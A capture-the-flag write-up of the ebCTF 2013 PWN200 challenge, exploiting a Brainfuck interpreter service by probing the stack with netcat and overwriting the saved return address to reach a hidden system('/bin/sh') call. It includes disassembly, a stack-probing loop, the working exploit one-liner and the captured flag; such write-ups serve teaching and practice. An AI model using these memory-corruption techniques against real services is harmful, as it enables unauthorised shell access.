ebCTF 2013 | PWN200 « Frainbuck Interderper » [Write Up]

« Pwn this service: 176.34.95.148 port 31313 »

We have a dynamically linked ELF 32-bit binary, running as a service on the host 176.34.95.148 and the port 31313.

[hexpresso@archlin EBCTF]$ nc 176.34.95.148 31313
>> EINDBAZEN FRAINBUCK INTERDERPER READY.
> GIVE ME SOMETHING TO DANCE FOR: ...
0x00000000
0x00000000
0x00000000

THANKS FOR SUPPORTING US WITH YOUR BRAIN!

By disassembling we immediately notice really interesting stuff. We have an unused function which starts a shell (system(« /bin/sh »)). At this point, we already know the aim will be to jump into <shell> at the address 0x08048a6e 😉

About the main procedure, we can see a single call to <bf_main>. It reads from stdin and compares our input with 8 possible cases through a switch condition.


08048a82 <main>:
8048a82:    55                       push   ebp
8048a83:    89 e5                    mov    ebp,esp
8048a85:    83 e4 f0                 and    esp,0xfffffff0
8048a88:    83 ec 10                 sub    esp,0x10
8048a8b:    8b 45 0c                 mov    eax,DWORD PTR [ebp+0xc]
8048a8e:    89 44 24 04              mov    DWORD PTR [esp+0x4],eax
8048a92:    8b 45 08                 mov    eax,DWORD PTR [ebp+0x8]
8048a95:    89 04 24                 mov    DWORD PTR [esp],eax
8048a98:    e8 6f fb ff ff           call   804860c <bf_main>
8048a9d:    c7 04 24 a0 8c 04 08     mov    DWORD PTR [esp],0x8048ca0
8048aa4:    e8 17 fa ff ff           call   80484c0 <puts@plt>
8048aa9:    b8 00 00 00 00           mov    eax,0x0
8048aae:    c9                       leave
8048aaf:    c3                       ret


08048a6e <shell>:
8048a6e:    55                       push   ebp
8048a6f:    89 e5                    mov    ebp,esp
8048a71:    83 ec 18                 sub    esp,0x18
8048a74:    c7 04 24 98 8c 04 08     mov    DWORD PTR [esp],0x8048c98  // "/bin/sh"
8048a7b:    e8 50 fa ff ff           call   80484d0 <system@plt>
8048a80:    c9                       leave
8048a81:    c3                       ret

According to the title, we can guess that we have a Brainfuck interpreter, precisely the <bf_main> function. Here are some instructions of this language with their meanings.


.    output the byte at the data pointer.
>    increment the data pointer (to point to the next cell).
<    decrement the data pointer (to point to the previous cell).
+    increment (increase by one) the byte at the data pointer.
-    decrement (decrease by one) the byte at the data pointer.

Let’s try to execute the binary and give bf commands to interpret. We can easily explore the stack with « > » and print its content with « . ». So, what do we have on the stack ? The idea was to find addresses starting with 0x08048 corresponding to binary’s instructions.

for i in {1..100}
do
echo $i
(python -c "print '>'*$i + '.' + '\n'") | nc 176.34.95.148 31313 | sed -n "/0x08048/p"
done

51
> GIVE ME SOMETHING TO DANCE FOR: 0x08048a9d
54
> GIVE ME SOMETHING TO DANCE FOR: 0x08048ab9
56
> GIVE ME SOMETHING TO DANCE FOR: 0x08048ab0
68
> GIVE ME SOMETHING TO DANCE FOR: 0x080482d8
79
> GIVE ME SOMETHING TO DANCE FOR: 0x08048520
85
> GIVE ME SOMETHING TO DANCE FOR: 0x08048520
87
> GIVE ME SOMETHING TO DANCE FOR: 0x08048541
88
> GIVE ME SOMETHING TO DANCE FOR: 0x08048a82
91
> GIVE ME SOMETHING TO DANCE FOR: 0x08048ab0
92
> GIVE ME SOMETHING TO DANCE FOR: 0x08048b20

Well, the first one 0x08048a9d is the return address of <bf_main>, in others words, the saved EIP. We are able to write on the stack, so if we change this address to 0x08048a6e, we will jump to the start of <shell>. So, we move the pointer to the 51th position, and decrement by one 47 (0x08048a9d – 0x08048a6e) times the pointed address.

The final exploitation is :

[hexpresso@archlin EBCTF]$ (python -c 'print ">"*51 + "-"*47 '; cat) | nc 176.34.95.148 31313
>> EINDBAZEN FRAINBUCK INTERDERPER READY.
> GIVE ME SOMETHING TO DANCE FOR: id
uid=1001(frainbuck) gid=1001(frainbuck) groups=1001(frainbuck)
cat IM_A_FLAG

huzzah, you did it!

did you know that turing machines have ruined my life?

Here you go: ebCTF{b01ea01dab226a3a207f921cc451ff3a}
Publicités

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s